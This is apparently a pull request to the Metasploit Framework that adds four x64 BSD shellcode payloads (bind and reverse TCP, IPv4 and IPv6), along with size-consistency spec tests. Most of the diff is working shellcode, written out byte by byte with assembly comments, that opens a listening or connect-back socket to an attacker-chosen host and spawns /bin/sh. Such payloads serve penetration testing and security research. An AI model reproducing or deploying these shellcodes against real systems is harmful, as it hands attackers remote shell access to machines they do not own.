### PR TITLE
new x64 bsd shellcodes (bind/reverse) ipv4/6

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -247,3 +247,6 @@ DEPENDENCIES
   simplecov
   timecop
   yard
+
+BUNDLED WITH
+   1.10.3

--- a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
@@ -10,6 +10,8 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
+  CachedSize = 89
+
   include Msf::Payload::Single
   include Msf::Payload::Bsd
   include Msf::Sessions::CommandShellOptions

--- a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
@@ -1,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Payload::Bsd
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'BSD x64 Command Shell, Bind TCP Inline (IPv6)',
+      'Description'   => 'Listen for a connection and spawn a command shell over IPv6',
+      'Author'        => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
+      'References'    => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_bind_tcp.asm.c'],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'bsd',
+      'Arch'          => ARCH_X86_64,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix,
+      'Payload'       =>
+        {
+          'Offsets' =>
+            {
+              'LPORT'    => [ 20, 'n' ],
+            },
+          'Payload' =>
+            "\x6a\x61"             +#   pushq  $0x61                       #
+            "\x58"                 +#  	pop    %rax                        #
+            "\x99"                 +#  	cltd                               #
+            "\x6a\x1c"             +#   pushq  $0x1c                       #
+            "\x5f"                 +#  	pop    %rdi                        #
+            "\x6a\x01"             +#   pushq  $0x1                        #
+            "\x5e"                 +#  	pop    %rsi                        #
+            "\x0f\x05"             +#   syscall                            #
+            "\x48\x97"             +#   xchg   %rax,%rdi                   #
+            "\x52"                 +#  	push   %rdx                        #
+            "\x52"                 +#  	push   %rdx                        #
+            "\x52"                 +#  	push   %rdx                        #
+            "\x68\x00\x1c\x11\x5c" +#   pushq  $0x5c111c00                 #
+            "\x48\x89\xe6"         +#   mov    %rsp,%rsi                   #
+            "\x6a\x1c"             +#   pushq  $0x1c                       #
+            "\x5a"                 +#  	pop    %rdx                        #
+            "\x04\x4c"             +#   add    $0x4c,%al                   #
+            "\x0f\x05"             +#   syscall                            #
+            "\x48\x31\xf6"         +#   xor    %rsi,%rsi                   #
+            "\x6a\x6a"             +#   pushq  $0x6a                       #
+            "\x58"                 +#  	pop    %rax                        #
+            "\x0f\x05"             +#   syscall                            #
+            "\x99"                 +#  	cltd                               #
+            "\x04\x1e"             +#   add    $0x1e,%al                   #
+            "\x0f\x05"             +#   syscall                            #
+            "\x48\x89\xc7"         +#   mov    %rax,%rdi                   #
+            "\x6a\x5a"             +#   pushq  $0x5a                       #
+            "\x58"                 +#  	pop    %rax                        #
+            "\x0f\x05"             +#   syscall                            #
+            "\xff\xc6"             +#   inc    %esi                        #
+            "\x04\x5a"             +#   add    $0x5a,%al                   #
+            "\x0f\x05"             +#   syscall                            #
+            "\xff\xc6"             +#  	inc    %esi                        #
+            "\x04\x59"             +#  	add    $0x59,%al                   #
+            "\x0f\x05"             +#  	syscall                            #
+            "\x52"                 +# 	push   %rdx                        #
+            "\x48\xbf\x2f\x2f\x62" +#   mov "//b"                          #
+	    "\x69\x6e\x2f\x73\x68" +# 	mov "in/sh",%rdi                   #
+            "\x57"                 +#	push   %rdi                        #
+            "\x48\x89\xe7"         +# 	mov    %rsp,%rdi                   #
+            "\x52"                 +# 	push   %rdx                        #
+            "\x57"                 +# 	push   %rdi                        #
+            "\x48\x89\xe6"         +#   mov    %rsp,%rsi                   #
+            "\x04\x39"             +#  	add    $0x39,%al                   #
+            "\x0f\x05"              # 	syscall                            #
+        }
+      ))
+  end
+
+end

--- a/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_bind_ipv6_tcp.rb
@@ -69,7 +69,7 @@ module Metasploit3
             "\x0f\x05"             +#  	syscall                            #
             "\x52"                 +# 	push   %rdx                        #
             "\x48\xbf\x2f\x2f\x62" +#   mov "//b"                          #
-	    "\x69\x6e\x2f\x73\x68" +# 	mov "in/sh",%rdi                   #
+            "\x69\x6e\x2f\x73\x68" +# 	mov "in/sh",%rdi                   #
             "\x57"                 +#	push   %rdi                        #
             "\x48\x89\xe7"         +# 	mov    %rsp,%rdi                   #
             "\x52"                 +# 	push   %rdx                        #

--- a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb
+++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb
@@ -10,6 +10,8 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
+  CachedSize = 87
+
   include Msf::Payload::Single
   include Msf::Payload::Bsd
   include Msf::Sessions::CommandShellOptions

--- a/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb
+++ b/modules/payloads/singles/bsd/x64/shell_bind_tcp_small.rb
@@ -1,0 +1,83 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/bind_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Payload::Bsd
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'BSD x64 Command Shell, Bind TCP Inline',
+      'Description'   => 'Listen for a connection and spawn a command shell',
+      'Author'        => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
+      'References'    => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_bind_tcp.asm.c'],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'bsd',
+      'Arch'          => ARCH_X86_64,
+      'Handler'       => Msf::Handler::BindTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix,
+      'Payload'       =>
+        {
+          'Offsets' =>
+            {
+              'LPORT'    => [ 18, 'n' ],
+            },
+          'Payload' =>
+            "\x6a\x61"             +#	pushq  $0x61                       #
+            "\x58"                 +#	pop    %rax                        #
+            "\x99"                 +#	cltd                               #
+            "\x6a\x02"             +#	pushq  $0x2                        #
+            "\x5f"                 +#	pop    %rdi                        #
+            "\x6a\x01"             +#	pushq  $0x1                        #
+            "\x5e"                 +#	pop    %rsi                        #
+            "\x0f\x05"             +#	syscall                            #
+            "\x48\x97"             +#	xchg   %rax,%rdi                   #
+            "\x52"                 +#	push   %rdx                        #
+            "\x68\x00\x02\x11\x5c" +#	pushq  $0x5c110200                 #
+            "\x48\x89\xe6"         +#	mov    %rsp,%rsi                   #
+            "\x6a\x10"             +#	pushq  $0x10                       #
+            "\x5a"                 +#	pop    %rdx                        #
+            "\x04\x66"             +#	add    $0x66,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\x48\x31\xf6"         +#	xor    %rsi,%rsi                   #
+            "\x6a\x6a"             +#	pushq  $0x6a                       #
+            "\x58"                 +#	pop    %rax                        #
+            "\x0f\x05"             +#	syscall                            #
+            "\x99"                 +#	cltd                               #
+            "\x04\x1e"             +#	add    $0x1e,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\x48\x89\xc7"         +#	mov    %rax,%rdi                   #
+            "\x6a\x5a"             +#	pushq  $0x5a                       #
+            "\x58"                 +#	pop    %rax                        #
+            "\x0f\x05"             +#	syscall                            #
+            "\xff\xc6"             +#	inc    %esi                        #
+            "\x04\x5a"             +#	add    $0x5a,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\xff\xc6"             +#	inc    %esi                        #
+            "\x04\x59"             +#	add    $0x59,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\x52"                 +#   push   %rdx                        #
+            "\x48\xbf\x2f\x2f"     +#   mov "//"                           #
+            "\x62\x69\x6e\x2f"     +#   "bin/sh"                           #
+            "\x73\x68"             +#   mov    $0x68732f6e69622f2f,%rdi    #
+            "\x57"                 +#	push   %rdi                        #
+            "\x48\x89\xe7"         +#	mov    %rsp,%rdi                   #
+            "\x52"                 +#	push   %rdx                        #
+            "\x57"                 +#	push   %rdi                        #
+            "\x48\x89\xe6"         +#	mov    %rsp,%rsi                   #
+            "\x04\x39"             +#	add    $0x39,%al                   #
+            "\x0f\x05"              #   syscall                            #
+        }
+      ))
+  end
+
+end

--- a/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
@@ -1,0 +1,90 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Payload::Bsd
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'BSD x64 Command Shell, Reverse TCP Inline (IPv6)',
+      'Description'   => 'Connect back to attacker and spawn a command shell over IPv6',
+      'Author'        => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
+      'References'    => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_ipv6_reverse_tcp.asm.c'],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'bsd',
+      'Arch'          => ARCH_X86_64,
+      'Handler'       => Msf::Handler::ReverseTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix,
+      'Payload'       =>
+        {
+          'Offsets' =>
+            {
+              'LHOST'    => [ 85, 'ADDR6' ],
+              'LPORT'    => [ 79, 'n' ],
+              'SCOPEID'  => [ 101,  'V' ]
+            },
+          'Payload' =>
+            "\x6a\x61"             +#  	pushq  $0x61                       #
+            "\x58"                 +#  	pop    %rax                        #
+            "\x99"                 +#  	cltd                               #
+            "\x6a\x1c"             +#  	pushq  $0x1c                       #
+            "\x5f"                 +#  	pop    %rdi                        #
+            "\x6a\x01"             +#   pushq  $0x1                        #
+            "\x5e"                 +#  	pop    %rsi                        #
+            "\x0f\x05"             +#   syscall                            #
+            "\x48\x97"             +#   xchg   %rax,%rdi                   #
+            "\x04\x3e"             +#   add    $0x3e,%al                   #
+            "\x0f\x05"             +#   syscall                            #
+            "\xff\xc6"             +#   inc    %esi                        #
+            "\x04\x59"             +#   add    $0x59,%al                   #
+            "\x0f\x05"             +#  	syscall                            #
+            "\xff\xce"             +#  	dec    %esi                        #
+            "\xff\xce"             +#   dec    %esi                        #
+            "\x04\x58"             +#   add    $0x58,%al                   #
+            "\x0f\x05"             +#   syscall                            #
+            "\xe9\x23\x00\x00\x00" +#   jmpq   <forth>                     #
+	    # back:
+            "\x5e"                 +#   pop    %rsi                        #
+            "\x6a\x1c"             +#   pushq  $0x1c                       #
+            "\x5a"                 +#  	pop    %rdx                        #
+            "\x66\x83\xc0\x62"     +#   add    $0x62,%ax                   #
+            "\x0f\x05"             +#   syscall                            #
+            "\x99"                 +#  	cltd                               #
+            "\x52"                 +#  	push   %rdx                        #
+            "\x48\xbf\x2f\x2f\x62" +#   mov "//b"                          #
+            "\x69\x6e\x2f\x73\x68" +#  	"in/sh",%rdi                       #
+            "\x57"                 +#  	push   %rdi                        #
+            "\x48\x89\xe7"         +#   mov    %rsp,%rdi                   #
+            "\x52"                 +#  	push   %rdx                        #
+            "\x57"                 +#  	push   %rdi                        #
+            "\x48\x89\xe6"         +#   mov    %rsp,%rsi                   #
+            "\x04\x3b"             +#   add    $0x3b,%al                   #
+            "\x0f\x05"             +# 	syscall                            #
+            # forth:
+            "\xe8\xd8\xff\xff\xff" +#   callq <back>                       #
+	    # sockaddr_in6
+            "\x00\x1c\x11\x5c"     +#   AF_INET6+port                      #
+            "\x00\x00\x00\x00"     +#   no-one-cares                       #
+            "\x00\x00\x00\x00"     +#   IPv6-                              #
+            "\x00\x00\x00\x00"     +#   addr-                              #
+            "\x00\x00\x00\x00"     +#   in-                                #
+            "\x00\x00\x00\x01"     +#   16 bytes                           #
+            "\x00\x00\x00\x00"      #   Scope ID                           #
+        }
+      ))
+      register_options([
+         OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses", 0])
+      ])
+  end
+
+end

--- a/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
@@ -53,7 +53,7 @@ module Metasploit3
             "\x04\x58"             +#   add    $0x58,%al                   #
             "\x0f\x05"             +#   syscall                            #
             "\xe9\x23\x00\x00\x00" +#   jmpq   <forth>                     #
-	    # back:
+            # back:
             "\x5e"                 +#   pop    %rsi                        #
             "\x6a\x1c"             +#   pushq  $0x1c                       #
             "\x5a"                 +#  	pop    %rdx                        #
@@ -72,7 +72,7 @@ module Metasploit3
             "\x0f\x05"             +# 	syscall                            #
             # forth:
             "\xe8\xd8\xff\xff\xff" +#   callq <back>                       #
-	    # sockaddr_in6
+            # sockaddr_in6
             "\x00\x1c\x11\x5c"     +#   AF_INET6+port                      #
             "\x00\x00\x00\x00"     +#   no-one-cares                       #
             "\x00\x00\x00\x00"     +#   IPv6-                              #

--- a/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
+++ b/modules/payloads/singles/bsd/x64/shell_reverse_ipv6_tcp.rb
@@ -10,6 +10,8 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
+  CachedSize = 105
+
   include Msf::Payload::Single
   include Msf::Payload::Bsd
   include Msf::Sessions::CommandShellOptions

--- a/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb
+++ b/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb
@@ -1,0 +1,78 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+  include Msf::Payload::Single
+  include Msf::Payload::Bsd
+  include Msf::Sessions::CommandShellOptions
+
+  def initialize(info = {})
+    super(merge_info(info,
+      'Name'          => 'BSD x64 Command Shell, Reverse TCP Inline',
+      'Description'   => 'Connect back to attacker and spawn a command shell',
+      'Author'        => 'Balazs Bucsay @xoreipeip <balazs.bucsay[-at-]rycon[-dot-]hu>',
+      'References'    => ['URL', 'https://github.com/earthquake/shellcodes/blob/master/x86_64_bsd_reverse_tcp.asm.c'],
+      'License'       => MSF_LICENSE,
+      'Platform'      => 'bsd',
+      'Arch'          => ARCH_X86_64,
+      'Handler'       => Msf::Handler::ReverseTcp,
+      'Session'       => Msf::Sessions::CommandShellUnix,
+      'Payload'       =>
+        {
+          'Offsets' =>
+            {
+              'LHOST'    => [ 39, 'ADDR' ],
+              'LPORT'    => [ 37, 'n' ],
+            },
+          'Payload' =>
+            "\x6a\x61"             +#	pushq  $0x61                       #
+            "\x58"                 +#	pop    %rax                        #
+            "\x99"                 +#	cltd                               #
+            "\x6a\x02"             +#	pushq  $0x2                        #
+            "\x5f"                 +#	pop    %rdi                        #
+            "\x6a\x01"             +#	pushq  $0x1                        #
+            "\x5e"                 +#	pop    %rsi                        #
+            "\x0f\x05"             +#	syscall                            #
+            "\x48\x97"             +#	xchg   %rax,%rdi                   #
+            "\x04\x58"             +#	add    $0x58,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\xff\xc6"             +#	inc    %esi                        #
+            "\x04\x59"             +#	add    $0x59,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\xff\xce"             +#	dec    %esi                        #
+            "\xff\xce"             +#	dec    %esi                        #
+            "\x04\x58"             +#	add    $0x58,%al                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\x52"                 +#	push   %rdx                        #
+            "\x48\xbb\x00\x02\x11" +#   mov    ...                         #
+            "\x5c\x7f\x00\x00\x01" +#   mov    $0x100007f5c110200,%rbx     #
+            "\x53"                 +#	push   %rbx                        #
+            "\x48\x89\xe6"         +#	mov    %rsp,%rsi                   #
+            "\x6a\x10"             +#	pushq  $0x10                       #
+            "\x5a"                 +#	pop    %rdx                        #
+            "\x66\x83\xc0\x62"     +#	add    $0x62,%ax                   #
+            "\x0f\x05"             +#	syscall                            #
+            "\x99"                 +#	cltd                               #
+            "\x52"                 +#	push   %rdx                        #
+            "\x48\xbf\x2f\x2f\x62" +#   mov "//b"                          #
+            "\x69\x6e\x2f\x73\x68" +# 	"in/sh", %rdi                      #
+            "\x57"                 +#	push   %rdi                        #
+            "\x48\x89\xe7"         +#	mov    %rsp,%rdi                   #
+            "\x52"                 +#	push   %rdx                        #
+            "\x57"                 +#	push   %rdi                        #
+            "\x48\x89\xe6"         +#	mov    %rsp,%rsi                   #
+            "\x04\x3b"             +#	add    $0x3b,%al                   #
+            "\x0f\x05"              #	syscall                            #
+        }
+      ))
+  end
+
+end

--- a/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb
+++ b/modules/payloads/singles/bsd/x64/shell_reverse_tcp_small.rb
@@ -10,6 +10,8 @@ require 'msf/base/sessions/command_shell_options'
 
 module Metasploit3
 
+  CachedSize = 81
+
   include Msf::Payload::Single
   include Msf::Payload::Bsd
   include Msf::Sessions::CommandShellOptions

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -286,6 +286,16 @@ describe 'modules/payloads', :content do
                           reference_name: 'bsd/x64/exec'
   end
 
+  context 'bsd/x64/shell_bind_ipv6_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_bind_ipv6_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_bind_ipv6_tcp'
+  end
+
   context 'bsd/x64/shell_bind_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -296,6 +306,26 @@ describe 'modules/payloads', :content do
                           reference_name: 'bsd/x64/shell_bind_tcp'
   end
 
+  context 'bsd/x64/shell_bind_tcp_small' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_bind_tcp_small'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_bind_tcp_small'
+  end
+
+  context 'bsd/x64/shell_reverse_ipv6_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_reverse_ipv6_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_reverse_ipv6_tcp'
+  end
+
   context 'bsd/x64/shell_reverse_tcp' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -304,6 +334,16 @@ describe 'modules/payloads', :content do
                           dynamic_size: false,
                           modules_pathname: modules_pathname,
                           reference_name: 'bsd/x64/shell_reverse_tcp'
+  end
+
+  context 'bsd/x64/shell_reverse_tcp_small' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_reverse_tcp_small'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_reverse_tcp_small'
   end
 
   context 'bsdi/x86/shell/bind_tcp' do

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -131,6 +131,76 @@ describe 'modules/payloads', :content do
                           reference_name: 'bsd/sparc/shell_reverse_tcp'
   end
 
+  context 'bsd/x64/exec' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/exec'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/exec'
+  end
+
+  context 'bsd/x64/shell_bind_ipv6_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_bind_ipv6_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_bind_ipv6_tcp'
+  end
+
+  context 'bsd/x64/shell_bind_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_bind_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_bind_tcp'
+  end
+
+  context 'bsd/x64/shell_bind_tcp_small' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_bind_tcp_small'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_bind_tcp_small'
+  end
+
+  context 'bsd/x64/shell_reverse_ipv6_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_reverse_ipv6_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_reverse_ipv6_tcp'
+  end
+
+  context 'bsd/x64/shell_reverse_tcp' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_reverse_tcp'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_reverse_tcp'
+  end
+
+  context 'bsd/x64/shell_reverse_tcp_small' do
+    it_should_behave_like 'payload cached size is consistent',
+                          ancestor_reference_names: [
+                              'singles/bsd/x64/shell_reverse_tcp_small'
+                          ],
+                          dynamic_size: false,
+                          modules_pathname: modules_pathname,
+                          reference_name: 'bsd/x64/shell_reverse_tcp_small'
+  end
+
   context 'bsd/x86/exec' do
     it_should_behave_like 'payload cached size is consistent',
                           ancestor_reference_names: [
@@ -274,76 +344,6 @@ describe 'modules/payloads', :content do
                           dynamic_size: false,
                           modules_pathname: modules_pathname,
                           reference_name: 'bsd/x86/shell_reverse_tcp_ipv6'
-  end
-
-  context 'bsd/x64/exec' do
-    it_should_behave_like 'payload cached size is consistent',
-                          ancestor_reference_names: [
-                              'singles/bsd/x64/exec'
-                          ],
-                          dynamic_size: false,
-                          modules_pathname: modules_pathname,
-                          reference_name: 'bsd/x64/exec'
-  end
-
-  context 'bsd/x64/shell_bind_ipv6_tcp' do
-    it_should_behave_like 'payload cached size is consistent',
-                          ancestor_reference_names: [
-                              'singles/bsd/x64/shell_bind_ipv6_tcp'
-                          ],
-                          dynamic_size: false,
-                          modules_pathname: modules_pathname,
-                          reference_name: 'bsd/x64/shell_bind_ipv6_tcp'
-  end
-
-  context 'bsd/x64/shell_bind_tcp' do
-    it_should_behave_like 'payload cached size is consistent',
-                          ancestor_reference_names: [
-                              'singles/bsd/x64/shell_bind_tcp'
-                          ],
-                          dynamic_size: false,
-                          modules_pathname: modules_pathname,
-                          reference_name: 'bsd/x64/shell_bind_tcp'
-  end
-
-  context 'bsd/x64/shell_bind_tcp_small' do
-    it_should_behave_like 'payload cached size is consistent',
-                          ancestor_reference_names: [
-                              'singles/bsd/x64/shell_bind_tcp_small'
-                          ],
-                          dynamic_size: false,
-                          modules_pathname: modules_pathname,
-                          reference_name: 'bsd/x64/shell_bind_tcp_small'
-  end
-
-  context 'bsd/x64/shell_reverse_ipv6_tcp' do
-    it_should_behave_like 'payload cached size is consistent',
-                          ancestor_reference_names: [
-                              'singles/bsd/x64/shell_reverse_ipv6_tcp'
-                          ],
-                          dynamic_size: false,
-                          modules_pathname: modules_pathname,
-                          reference_name: 'bsd/x64/shell_reverse_ipv6_tcp'
-  end
-
-  context 'bsd/x64/shell_reverse_tcp' do
-    it_should_behave_like 'payload cached size is consistent',
-                          ancestor_reference_names: [
-                              'singles/bsd/x64/shell_reverse_tcp'
-                          ],
-                          dynamic_size: false,
-                          modules_pathname: modules_pathname,
-                          reference_name: 'bsd/x64/shell_reverse_tcp'
-  end
-
-  context 'bsd/x64/shell_reverse_tcp_small' do
-    it_should_behave_like 'payload cached size is consistent',
-                          ancestor_reference_names: [
-                              'singles/bsd/x64/shell_reverse_tcp_small'
-                          ],
-                          dynamic_size: false,
-                          modules_pathname: modules_pathname,
-                          reference_name: 'bsd/x64/shell_reverse_tcp_small'
   end
 
   context 'bsdi/x86/shell/bind_tcp' do


### PR DESCRIPTION
New bind and reverse shellcodes for 64bit BSD with ipv4 and ipv6 support. The ipv4 shells are already existed when I started coding, but my tree was obsolete so I did not notice. Anyways my versions are smaller and I guess one thing that is important about shellcodes is the size. Let me know if you need anything fixed or modified.
